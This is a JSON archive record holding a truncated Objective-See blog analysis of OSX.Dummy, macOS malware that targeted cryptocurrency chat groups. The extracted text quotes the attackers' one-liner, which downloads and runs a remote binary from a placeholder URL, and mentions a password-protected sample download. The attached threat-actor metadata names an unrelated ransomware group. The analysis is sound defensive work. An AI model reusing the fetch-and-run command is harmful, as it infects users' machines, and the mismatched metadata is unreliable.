{
	"id": "830d0728-b73d-49a9-80c5-1a6b0e1d432f",
	"created_at": "2026-04-06T00:07:48.748987Z",
	"updated_at": "2026-04-10T13:12:24.140653Z",
	"deleted_at": null,
	"sha1_hash": "0950778f17320bcfce725944181c94a7d7f2c530",
	"title": "Objective-See",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 274250,
	"plain_text": "Objective See\r\nproducts malware blog about\r\nOSX.Dummy\r\nnew mac malware targets the cryptocurrency community\r\n06/29/2018\r\nEnjoy these blog posts? You can support my writing \u0026 tools on patreon! ♡\r\nEarly today, Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS 'InfoSec Handlers Diary Blog'.\r\nTitled \"Crypto community target of MacOS malware\" he noted:\r\n\"Previous days we've seen multiple MacOS malware attacks, originating within crypto related Slack or\r\nDiscord chats groups by impersonating admins or key people. Small snippets are being shared,\r\nresulting in downloading and executing a malicious binary.\"\r\nHis great writeup notes the initial infection vector and provides an overview of the malware, including its method of\r\npersistence (launch daemon) and purpose (reverse shell).\r\nHere, we dive in a touch deeper into the malware and illustrate how Objective-See's tools can generically thwart this\r\nnew threat, at every step of the way!\r\nWant to play along? 👾☠️\r\nI've shared the malware, which can be downloaded here (password: infect3d).\r\nRemco Verhoef states the malware attacks are:\r\n\"originating within crypto related Slack or Discord chats groups by impersonating admins or key people.\r\nSmall snippets are being shared, resulting in downloading and executing a malicious binary.\r\nApparently attackers are asking users to infect themselves, via the following command:\r\n$ cd /tmp \u0026\u0026 curl -s curl $MALICIOUS_URL \u003e script \u0026\u0026 chmod +x script \u0026\u0026 ./script\r\nIf users fall for this (rather lame social engineering trick, a rather massive machO binary will be downloaded and\r\nexecuted.\r\nMassive you say? Yes, it clocks in at 34M:\r\n$ du -h /tmp/script 34M script\r\nUsing WhatsYourSign, we can see that the malicious binary is not signed:\r\nOSX.Dummy\r\n© 2018 objective-see llc support us!  ✉\r\nAloha!\r\nSign up for our newsletter and\r\nnotifications about new tools \u0026\r\nblog posts?\r\nEmail Address\r\nSubscribe\r\nhttps://objective-see.com/blog/blog_0x32.html\r\nPage 1 of 1",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://objective-see.com/blog/blog_0x32.html"
	],
	"report_names": [
		"blog_0x32.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434068,
	"ts_updated_at": 1775826744,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0950778f17320bcfce725944181c94a7d7f2c530.pdf",
		"text": "https://archive.orkl.eu/0950778f17320bcfce725944181c94a7d7f2c530.txt",
		"img": "https://archive.orkl.eu/0950778f17320bcfce725944181c94a7d7f2c530.jpg"
	}
}